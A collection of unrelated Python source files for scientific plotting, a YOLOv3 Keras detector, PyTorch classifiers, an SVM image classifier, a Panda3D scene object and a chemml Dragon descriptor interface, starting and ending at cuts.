dirty_noise_map=dirty_noise_map,
dirty_signal_to_noise_map=dirty_signal_to_noise_map,
dirty_model_image=dirty_model_image,
dirty_residual_map=dirty_residual_map,
dirty_normalized_residual_map=dirty_normalized_residual_map,
dirty_chi_squared_map=dirty_chi_squared_map,
auto_labels=AutoLabels(filename=auto_filename),
)
def subplot_fit_interferometer(self):
"""
Standard subplot of the attributes of the plotter's `FitInterferometer` object.
"""
return self.subplot(
residual_map_real=True,
normalized_residual_map_real=True,
chi_squared_map_real=True,
residual_map_imag=True,
normalized_residual_map_imag=True,
chi_squared_map_imag=True,
auto_filename="subplot_fit_interferometer",
)
def subplot_fit_dirty_images(self):
"""
Standard subplot of the dirty attributes of the plotter's `FitInterferometer` object.
"""
return self.subplot(
dirty_image=True,
dirty_signal_to_noise_map=True,
dirty_model_image=True,
dirty_residual_map=True,
dirty_normalized_residual_map=True,
dirty_chi_squared_map=True,
auto_filename="subplot_fit_dirty_images",
)
class FitInterferometerPlotter(Plotter):
def __init__(
self,
fit: FitInterferometer,
mat_plot_1d: MatPlot1D = MatPlot1D(),
visuals_1d: Visuals1D = Visuals1D(),
include_1d: Include1D = Include1D(),
mat_plot_2d: MatPlot2D = MatPlot2D(),
visuals_2d: Visuals2D = Visuals2D(),
include_2d: Include2D = Include2D(),
):
"""
Plots the attributes of `FitInterferometer` objects using the matplotlib method `imshow()` and many other
matplotlib functions which customize the plot's appearance.
The `mat_plot_2d` attribute wraps matplotlib function calls to make the figure. By default, the settings
passed to every matplotlib function called are those specified in the `config/visualize/mat_wrap/*.ini` files,
but a user can manually input values into `MatPlot2d` to customize the figure's appearance.
Overlaid on the figure are visuals, contained in the `Visuals2D` object. Attributes may be extracted from
the `FitInterferometer` and plotted via the visuals object, if the corresponding entry is `True` in the `Include2D`
object or the `config/visualize/include.ini` file.
Parameters
----------
fit
The fit to an interferometer dataset the plotter plots.
mat_plot_2d
Contains objects which wrap the matplotlib function calls that make the plot.
visuals_2d
Contains visuals that can be overlaid on the plot.
include_2d
Specifies which attributes of the `Array2D` are extracted and plotted as visuals.
"""
super().__init__(
mat_plot_1d=mat_plot_1d,
include_1d=include_1d,
visuals_1d=visuals_1d,
mat_plot_2d=mat_plot_2d,
include_2d=include_2d,
visuals_2d=visuals_2d,
)
self.fit = fit
self._fit_interferometer_meta_plotter = FitInterferometerPlotterMeta(
fit=self.fit,
get_visuals_2d_real_space=self.get_visuals_2d_real_space,
mat_plot_1d=self.mat_plot_1d,
include_1d=self.include_1d,
visuals_1d=self.visuals_1d,
mat_plot_2d=self.mat_plot_2d,
include_2d=self.include_2d,
visuals_2d=self.visuals_2d,
)
self.figures_2d = self._fit_interferometer_meta_plotter.figures_2d
self.subplot = self._fit_interferometer_meta_plotter.subplot
self.subplot_fit_interferometer = (
self._fit_interferometer_meta_plotter.subplot_fit_interferometer
)
self.subplot_fit_dirty_images = (
self._fit_interferometer_meta_plotter.subplot_fit_dirty_images
)
def get_visuals_2d_real_space(self) -> Visuals2D:
return self.get_2d.via_mask_from(mask=self.fit.interferometer.real_space_mask)
|
# safety path definitions |
import html
import re
_CAMEL_CASE_RE = re.compile(r'([a-z])([A-Z])')
def format_label(label: str) -> str:
return _CAMEL_CASE_RE.sub(r'\1 \2', label).lower().replace('_', ' ')
def preformat_html(solution: str) -> str:
return '<pre>%s</pre>' % html.escape(solution).replace('\n', '<br />')
|
import sys
import os
from nose.tools import assert_equal
ROOT_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(ROOT_DIR, '..'))
from component.intent.request import Request
from component.intent.response import Response
class TestIntentResponse(object):
def test_create_response_from_request(self):
request = Request()
request.intent_name = 'abc'
request.lang = 'jp_JP'
request.data = {
'a': 'a', 'b': 'b'
}
response = Response(request)
assert_equal(response.intent_name, request.intent_name)
assert_equal(response.lang, request.lang)
assert_equal(response.data, request.data)
|
from keras.models import Model
from keras.layers import Conv2D, Input, BatchNormalization, LeakyReLU, ZeroPadding2D, UpSampling2D, Dense, Flatten, Activation, Reshape, Lambda
from keras.layers.merge import add, concatenate
import tensorflow as tf
from keras import backend as K
ANC_VALS = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]]
def _conv_block(inp, convs, skip=True, train=False):
x = inp
count = 0
for conv in convs:
if count == (len(convs) - 2) and skip:
skip_connection = x
count += 1
if conv['stride'] > 1: x = ZeroPadding2D(((1,0),(1,0)))(x) # peculiar padding as darknet prefer left and top
if 'train' in conv:
trainflag=conv['train']#update the value for the key
else:
trainflag=train
x = Conv2D(conv['filter'],
conv['kernel'],
strides=conv['stride'],
padding='valid' if conv['stride'] > 1 else 'same', # peculiar padding as darknet prefer left and top
name='conv_' + str(conv['layer_idx']),
use_bias=False if conv['bnorm'] else True, trainable=trainflag)(x)
if conv['bnorm']: x = BatchNormalization(epsilon=0.001, name='bnorm_' + str(conv['layer_idx']),trainable=trainflag)(x)
if conv['leaky']: x = LeakyReLU(alpha=0.1, name='leaky_' + str(conv['layer_idx']),trainable=trainflag)(x)
return add([skip_connection, x]) if skip else x
def crop(start, end):
# Crops (or slices) a Tensor on fourth dimension from start to end
def func(x):
return x[:, :, :, :, start: end]
return Lambda(func)
def anchors(i):
def func(x):
anc = tf.constant(ANC_VALS[i], dtype='float', shape=[1,1,1,3,2])
return tf.exp(x) * anc
return Lambda(func)
def positions(h,w):
def func(x):
# compute grid factor and net factor
grid_h = tf.shape(x)[1]
grid_w = tf.shape(x)[2]
grid_factor = tf.reshape(tf.cast([grid_w, grid_h], tf.float32), [1,1,1,1,2])
net_factor = tf.reshape(tf.cast([w, h], tf.float32), [1,1,1,1,2])
cell_x = tf.to_float(tf.reshape(tf.tile(tf.range(tf.maximum(grid_h,grid_w)), [tf.maximum(grid_h,grid_w)]), (1, tf.maximum(grid_h,grid_w), tf.maximum(grid_h,grid_w), 1, 1)))
cell_y = tf.transpose(cell_x, (0,2,1,3,4))
cell_grid = tf.tile(tf.concat([cell_x,cell_y],-1), [1, 1, 1, 3, 1])
pred_box_xy = (cell_grid[:,:grid_h,:grid_w,:,:] + x)
pred_box_xy = pred_box_xy * net_factor/grid_factor
return pred_box_xy
return Lambda(func)
def get_yolo_model(in_w=416,in_h=416, num_class=80, trainable=False, headtrainable=False):
# for each box we have num_class outputs, 4 bbox coordinates, and 1 object confidence value
out_size = num_class+5
input_image = Input(shape=( in_h,in_w, 3))
# Layer 0 => 4
x = _conv_block(input_image, [{'filter': 32, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 0},
{'filter': 64, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 1},
{'filter': 32, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 2},
{'filter': 64, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 3}], train=trainable)
# Layer 5 => 8
x = _conv_block(x, [{'filter': 128, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 5},
{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 6},
{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 7}], train=trainable)
# Layer 9 => 11
x = _conv_block(x, [{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 9},
{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 10}], train=trainable)
# Layer 12 => 15
x = _conv_block(x, [{'filter': 256, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 12},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 13},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 14}], train=trainable)
# Layer 16 => 36
for i in range(7):
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 16+i*3},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 17+i*3}], train=trainable)
skip_36 = x
# Layer 37 => 40
x = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 37},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 38},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 39}], train=trainable)
# Layer 41 => 61
for i in range(7):
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 41+i*3},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 42+i*3}], train=trainable)
skip_61 = x
# Layer 62 => 65
x = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 62},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 63},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 64}], train=trainable)
# Layer 66 => 74
for i in range(3):
x = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 66+i*3},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 67+i*3}], train=trainable)
# Layer 75 => 79
x = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 75},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 76},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 77},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 78},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 79}], skip=False, train=trainable)
# Layer 80 => 82
if num_class!=80:
yolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},
{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False,'train': headtrainable, 'layer_idx': 981}], skip=False, train=trainable)
else:
yolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},
{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False,'train': headtrainable, 'layer_idx': 81}], skip=False, train=trainable)
# Layer 83 => 86
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 84}], skip=False, train=trainable)
x = UpSampling2D(2)(x)
x = concatenate([x, skip_61])
# Layer 87 => 91
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 87},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 88},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 89},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 90},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 91}], skip=False, train=trainable)
# Layer 92 => 94
if num_class!=80:
yolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},
{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable, 'layer_idx': 993}], skip=False, train=trainable)
else:
yolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},
{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable, 'layer_idx': 93}], skip=False, train=trainable)
# Layer 95 => 98
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 96}], skip=False, train=trainable)
x = UpSampling2D(2)(x)
x = concatenate([x, skip_36])
# Layer 99 => 106
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 99},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 100},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 101},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 102},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 103},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 104},], skip=False, train=trainable)
if num_class!=80:
yolo_106 = _conv_block(x, [{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable,'layer_idx': 9105}], skip=False, train=trainable)
else:
yolo_106 = _conv_block(x, [{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable,'layer_idx': 105}], skip=False, train=trainable)
final_large = Reshape((in_h//32,in_w//32,3,out_size))(yolo_82)
final_med = Reshape((in_h//16, in_w//16,3,out_size))(yolo_94)
final_small = Reshape((in_h//8,in_w//8,3,out_size))(yolo_106)
#output = [final_large, final_med, final_small]
#model = Model(input_image,output)
#return model
s_offs =crop(0,2)(final_small)
s_szs =crop(2,4)(final_small)
s_scores =crop(4,out_size)(final_small)
s_scores = Activation('sigmoid')(s_scores)
s_szs = anchors(2)(s_szs)
s_offs = Activation('sigmoid')(s_offs)
s_offs = positions(in_h,in_w)(s_offs)
s_out = concatenate([s_offs, s_szs, s_scores])
m_offs =crop(0,2)(final_med)
m_szs =crop(2,4)(final_med)
m_scores =crop(4,out_size)(final_med)
m_scores = Activation('sigmoid')(m_scores)
m_szs = anchors(1)(m_szs)
m_offs = Activation('sigmoid')(m_offs)
m_offs = positions(in_h,in_w)(m_offs)
m_out = concatenate([m_offs, m_szs, m_scores])
l_offs =crop(0,2)(final_large)
l_szs =crop(2,4)(final_large)
l_scores =crop(4,out_size)(final_large)
l_scores = Activation('sigmoid')(l_scores)
l_szs = anchors(0)(l_szs)
l_offs = Activation('sigmoid')(l_offs)
l_offs = positions(in_h,in_w)(l_offs)
l_out = concatenate([l_offs, l_szs, l_scores])
output = [l_out, m_out, s_out]
model = Model(input_image,output)
return model
|
print("matrícula") |
#!/usr/bin/env python
__all__ = ["nemo"]
|
# Author: Thomas Porturas <thomas.porturas.eras@gmail.com>
from . import model_utilities as mu
from .data_preprocessing import process_files
from .figure_pipeline import run_pipeline
from .data_nl_processing import NlpForLdaInput
from .compare_models import CompareModels, run_model_comparison
from .optimize_mallet import CompareMalletModels
from .mallet_model import MalletModel, generate_mallet_models
|
cidade = input('Digite o produto de uma cidade: ').strip().upper()
print('A cidade começa com a palavra Santo? {}'.format('SANTO' in cidade[:5]))
|
from direct.showbase.DirectObject import DirectObject
from panda3d.core import *
class Castle(DirectObject):
def __init__(self, pos,hpr,sc):
self.model = loader.loadModel("models/castle")
self.model.setPos(pos.getX(),pos.getY(),pos.getZ())
self.model.setHpr(hpr.getX(),hpr.getY(),hpr.getZ())
self.model.setScale(sc)
self.model.reparentTo(render)
|
# optional -> get data based on the specified location |
#
#
# Server side image processing
# Adding PCA dimensionality reduction
#
from __future__ import print_function
from time import time
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.svm import SVC
from sklearn.externals import joblib
from sklearn.decomposition import RandomizedPCA
import numpy as np
if __name__ == "__main__":
# Dataset location and file structure
dataDir = '/Users/andy/Documents/Software/imageProcessing/'
dataFile = 'X.csv'
labelFile = 'y.csv'
testDataFile = 'Xtest.csv'
testLabelFile = 'ytest.csv'
testNameFile = 'NamesTest.csv'
modelName = 'svmImageClassifier.pkl'
############################################################################
X = np.genfromtxt(dataDir+dataFile, delimiter=',')
X = X[:,0:3200] # TODO Fix nan column
y = np.genfromtxt(dataDir+labelFile, delimiter=',')
n_samples,n_features = X.shape
############################################################################
# PCA for dimensionality reduction
############################################################################
n_components = 25
pca = RandomizedPCA(n_components=n_components, whiten=True).fit(X)
joblib.dump(pca, dataDir+'transform.pkl')
eigenpeople = pca.components_.reshape((n_components, 80, 40)) # TODO: automatically get h and w
X_train_pca = pca.transform(X)
############################################################################
# Train a SVM classification model
############################################################################
print("Fitting the classifier to the training set")
t0 = time()
param_grid = {'C': [1e2, 5e2, 1e3, 5e3, 1e4],
'gamma': [0.00001, 0.00005, 0.0001, 0.0005, 0.001, 0.005], }
clf = GridSearchCV(SVC(kernel='linear', class_weight='auto'), param_grid) # 13 errors in 107 test set
# clf = GridSearchCV(SVC(kernel='rbf', class_weight='auto'), param_grid)
clf = clf.fit(X_train_pca, y)
print("done in %0.3fs" % (time() - t0))
print("Best estimator found by grid search:")
print(clf.best_estimator_)
# Save model to disk
clf = clf.best_estimator_
joblib.dump(clf, dataDir+'imageSvmClassifier.pkl')
y_pred = clf.predict(X_train_pca)
print(classification_report(y, y_pred, target_names=list(str(y))))
############################################################################
# Quantitative evaluation of the model quality on the test set
############################################################################
Xtest = np.genfromtxt(dataDir+testDataFile, delimiter=',')
Xtest = Xtest[:, 0:3200]
ytest = np.genfromtxt(dataDir+testLabelFile, delimiter=',')
nameListTest = []
# fName = open(dataDir+testNameFile)
# nl = fName.readline()
# while nl<>'':
# nameListTest.append(nl)
# nl = fName.readline()
with open(dataDir+testNameFile) as fName:
for line in fName:
nameListTest.append(line)
print("Predicting presence of people in the test set")
t0 = time()
X_test_pca = pca.transform(Xtest)
y_pred = clf.predict(X_test_pca)
print("done in %0.3fs" % (time() - t0))
# print(classification_report(ytest, y_pred, target_names=list(strytest)))
print(y_pred)
nn = ytest.shape[0]
errorCount = 0
for i in range(ytest.shape[0]):
flag = ''
if (ytest[i]<>y_pred[i]):
errorCount += 1
flag = '---- error ---'
print('For '+nameListTest[i].strip()+' '+'Actual: '+str(ytest[i])+
' Predicted: '+str(y_pred[i])+flag)
print(str(nn)+' test set elements')
print(str(errorCount)+' incorrectly classified')
# print(confusion_matrix(y_test, y_pred, labels=range(n_classes)))
|
__author__ = 'OpenSlides Team <support@openslides.org>'
__description__ = 'Presentation and assembly system'
__version__ = '2.0.1-dev'
|
import torch
from torch import nn
from torch.nn import functional as F
class mlp_classifier(nn.Module):
def __init__(self, in_dim, hidden_dims=None, bn=True, drop_rate=0.0, num_classes=2):
super(mlp_classifier, self).__init__()
self.drop_rate = drop_rate
modules = []
if hidden_dims is None:
hidden_dims = []
hidden_dims = [in_dim] + hidden_dims
for layer_idx in range(len(hidden_dims)-1):
if bn:
modules.append(
nn.Sequential(
nn.Linear(hidden_dims[layer_idx], hidden_dims[layer_idx+1]),
nn.BatchNorm1d(hidden_dims[layer_idx+1]),
nn.ReLU(),
nn.Dropout(drop_rate))
)
else:
modules.append(
nn.Sequential(
nn.Linear(hidden_dims[layer_idx], hidden_dims[layer_idx+1]),
nn.ReLU(),
nn.Dropout(drop_rate))
)
self.features = None if len(modules) == 0 else nn.Sequential(*modules)
self.logits = nn.Linear(hidden_dims[-1], num_classes)
def forward(self, input):
features = F.dropout(input, p=self.drop_rate, training=self.training)
if self.features is not None: features = self.features(features)
return self.logits(features)
class binary_classifier(nn.Module):
def __init__(self, in_dim, hidden_dims=None, bn=True, drop_rate=0.0):
super(binary_classifier, self).__init__()
self.drop_rate = drop_rate
modules = []
if hidden_dims is None:
hidden_dims = []
hidden_dims = [in_dim] + hidden_dims
for layer_idx in range(len(hidden_dims)-1):
if bn:
modules.append(
nn.Sequential(
nn.Linear(hidden_dims[layer_idx], hidden_dims[layer_idx+1]),
nn.BatchNorm1d(hidden_dims[layer_idx+1]),
nn.ReLU(),
nn.Dropout(drop_rate))
)
else:
modules.append(
nn.Sequential(
nn.Linear(hidden_dims[layer_idx], hidden_dims[layer_idx+1]),
nn.ReLU(),
nn.Dropout(drop_rate))
)
self.features = None if len(modules) == 0 else nn.Sequential(*modules)
self.logit = nn.Linear(hidden_dims[-1], 1)
self.sigmoid = nn.Sigmoid()
def forward(self, input):
features = F.dropout(input, p=self.drop_rate, training=self.training)
if self.features is not None: features = self.features(features)
return self.sigmoid(self.logit(features))
class vgg_classifier(nn.Module):
def __init__(self, num_classes=2):
super(vgg_classifier, self).__init__()
self.convnet = nn.Sequential(
nn.Conv2d(128, 256, kernel_size=3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(256, 512, kernel_size=3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, kernel_size=3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, kernel_size=3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(512, 512, kernel_size=3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, kernel_size=3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, kernel_size=3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
)
self.fcnet = nn.Sequential(
nn.Linear(512 * 1, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, num_classes),
)
def forward(self, x):
out = self.convnet(x)
out = out.view(out.size(0), -1)
out = self.fcnet(out)
return out
|
"""
Created on 01 March 2016
@author: Mojtaba Haghighatlari
"""
from __future__ import print_function
from builtins import range
import warnings
import os
import time
import pandas as pd
from lxml import objectify, etree
from chemml.utils import std_datetime_str
from chemml.utils import bool_formatter
from chemml.utils import tot_exec_time_str
class Dragon(object):
"""
An interface to Dragon 6 and 7 chemoinformatics software. Dragon is a commercial software and
you should provide
Parameters
----------
version: int, optional (default=7)
The version of available Dragon on the user's system. (available versions: 6 or 7)
Weights: list, optional (default=["Mass","VdWVolume","Electronegativity","Polarizability","Ionization","I-State"])
A list of weights to be used
blocks: list, optional (default = list(range(1,31)))
A list of integers as descriptor blocks' id. There are totally 29 and 30 blocks available in
version 6 and 7, respectively.
This module is not atimed to cherry pick descriptors in each block.
For doing so, please use Script Wizard in Drgon GUI.
external: boolean, optional (default=False)
If True, include external variables at the end of each saved file.
Notes
-----
The documentation for the rest of parameters can be found in the following links:
- http://www.talete.mi.it/help/dragon_help/index.html
- https://chm.kode-solutions.net/products_dragon_tutorial.php
In the current version, we recommend the user to use this class with the following parameters:
molInput = 'file'
molfile = path to one SMILES representation file with .smi format or a dictionary of many filepaths
script = 'new'
Examples
--------
>>> import pandas as pd
>>> from chemml.chem import Dragon
>>> drg = Dragon()
>>> drg.script_wizard(script='new', output_directory='./')
>>> drg.run()
>>> df = drg.convert_to_csv(remove=True)
>>> df = df.drop(['No.','NAME'], axis=1)
"""
def __init__(self,
version=7,
molFile='required_required',
molInput="file",
CheckUpdates=True,
SaveLayout=True,
PreserveTemporaryProjects=True,
ShowWorksheet=False,
Decimal_Separator=".",
Missing_String="NaN",
DefaultMolFormat="1",
HelpBrowser="/usr/bin/xdg-open",
RejectUnusualValence=False,
Add2DHydrogens=False,
MaxSRforAllCircuit="19",
MaxSR="35",
MaxSRDetour="30",
MaxAtomWalkPath="2000",
LogPathWalk=True,
LogEdge=True,
Weights=("Mass", "VdWVolume", "Electronegativity", "Polarizability", "Ionization",
"I-State"),
SaveOnlyData=False,
SaveLabelsOnSeparateFile=False,
SaveFormatBlock="%b-%n.txt",
SaveFormatSubBlock="%b-%s-%n-%m.txt",
SaveExcludeMisVal=False,
SaveExcludeAllMisVal=False,
SaveExcludeConst=False,
SaveExcludeNearConst=False,
SaveExcludeStdDev=False,
SaveStdDevThreshold="0.0001",
SaveExcludeCorrelated=False,
SaveCorrThreshold="0.95",
SaveExclusionOptionsToVariables=False,
SaveExcludeMisMolecules=False,
SaveExcludeRejectedMolecules=False,
blocks=list(range(1, 31)),
molInputFormat="SMILES",
SaveStdOut=False,
SaveProject=False,
SaveProjectFile="Dragon_project.drp",
SaveFile=True,
SaveType="singlefile",
SaveFilePath="Dragon_descriptors.txt",
logMode="file",
logFile="Dragon_log.txt",
external=False,
fileName=None,
delimiter=",",
consecutiveDelimiter=False,
MissingValue="NaN",
RejectDisconnectedStrucuture=False,
RetainBiggestFragment=False,
DisconnectedCalculationOption="0",
RoundCoordinates=True,
RoundWeights=True,
RoundDescriptorValues=True,
knimemode=False):
if version in (6, 7):
self.version = version
else:
msg = "Only version 6 and 7 are available through this module."
raise ValueError(msg)
self.molFile = molFile
self.molInput = molInput
self.CheckUpdates = CheckUpdates
self.PreserveTemporaryProjects = PreserveTemporaryProjects
self.SaveLayout = SaveLayout
self.ShowWorksheet = ShowWorksheet
self.Decimal_Separator = Decimal_Separator
self.Missing_String = Missing_String
self.DefaultMolFormat = DefaultMolFormat
self.HelpBrowser = HelpBrowser
self.RejectUnusualValence = RejectUnusualValence
self.Add2DHydrogens = Add2DHydrogens
self.MaxSRforAllCircuit = MaxSRforAllCircuit
self.MaxSR = MaxSR
self.MaxSRDetour = MaxSRDetour
self.MaxAtomWalkPath = MaxAtomWalkPath
self.LogPathWalk = LogPathWalk
self.LogEdge = LogEdge
self.Weights = Weights
self.SaveOnlyData = SaveOnlyData
self.SaveLabelsOnSeparateFile = SaveLabelsOnSeparateFile
self.SaveFormatBlock = SaveFormatBlock
self.SaveFormatSubBlock = SaveFormatSubBlock
self.SaveExcludeMisVal = SaveExcludeMisVal
self.SaveExcludeAllMisVal = SaveExcludeAllMisVal
self.SaveExcludeConst = SaveExcludeConst
self.SaveExcludeNearConst = SaveExcludeNearConst
self.SaveExcludeStdDev = SaveExcludeStdDev
self.SaveStdDevThreshold = SaveStdDevThreshold
self.SaveExcludeCorrelated = SaveExcludeCorrelated
self.SaveCorrThreshold = SaveCorrThreshold
self.SaveExclusionOptionsToVariables = SaveExclusionOptionsToVariables
self.SaveExcludeMisMolecules = SaveExcludeMisMolecules
self.SaveExcludeRejectedMolecules = SaveExcludeRejectedMolecules
self.blocks = blocks
self.molInputFormat = molInputFormat
self.SaveStdOut = SaveStdOut
self.SaveProject = SaveProject
self.SaveProjectFile = SaveProjectFile
self.SaveFile = SaveFile
self.SaveType = SaveType
self.SaveFilePath = SaveFilePath
self.logMode = logMode
self.logFile = logFile
self.external = external
self.fileName = fileName
self.delimiter = delimiter
self.consecutiveDelimiter = consecutiveDelimiter
self.MissingValue = MissingValue
self.RejectDisconnectedStrucuture = RejectDisconnectedStrucuture
self.RetainBiggestFragment = RetainBiggestFragment
self.DisconnectedCalculationOption = DisconnectedCalculationOption
self.RoundCoordinates = RoundCoordinates
self.RoundWeights = RoundWeights
self.RoundDescriptorValues = RoundDescriptorValues
self.knimemode = knimemode
def script_wizard(self, script='new', output_directory='./'):
"""
The script_wizard is designed to build a Dragon script file. The name and
the functionality of this function is the same as available Script wizard
in the Dragon Graphic User Interface.
Note: All reported nodes are mandatory, except the <EXTERNAL> tag
Note: Script for version 7 doesn't support fingerprints block
Parameters
----------
script: string, optional (default="new")
If "new" start creating a new script from scratch. If you want to load an existing script,
pass the filename with drs format.
output_directory: string, optional (default = './')
the path to the working directory to store output files.
dragon: xml element
Dragon script in xml format.
drs: string
Dragon script file name
data_path: string
The path+name of saved data file in any format. If saveType is 'block'
or 'subblock' data_path is just the path to the directory that all data
files have been saved.
Returns
-------
class parameters
"""
self.output_directory = output_directory
if not os.path.exists(self.output_directory):
os.makedirs(self.output_directory)
if script == 'new':
if self.version == 6:
self.dragon = objectify.Element(
"DRAGON",
version="%i.0.0" % self.version,
script_version="1",
generation_date=std_datetime_str('date').replace('-', '/'))
OPTIONS = objectify.SubElement(self.dragon, "OPTIONS")
OPTIONS.append(
objectify.Element("CheckUpdates", value=bool_formatter(self.CheckUpdates)))
OPTIONS.append(objectify.Element("SaveLayout", value=bool_formatter(self.SaveLayout)))
OPTIONS.append(
objectify.Element("ShowWorksheet", value=bool_formatter(self.ShowWorksheet)))
OPTIONS.append(objectify.Element("Decimal_Separator", value=self.Decimal_Separator))
OPTIONS.append(objectify.Element("Missing_String", value=self.Missing_String))
OPTIONS.append(objectify.Element("DefaultMolFormat", value=self.DefaultMolFormat))
OPTIONS.append(objectify.Element("HelpBrowser", value=self.HelpBrowser))
OPTIONS.append(
objectify.Element(
"RejectUnusualValence", value=bool_formatter(self.RejectUnusualValence)))
OPTIONS.append(
objectify.Element("Add2DHydrogens", value=bool_formatter(self.Add2DHydrogens)))
OPTIONS.append(objectify.Element("MaxSRforAllCircuit", value=self.MaxSRforAllCircuit))
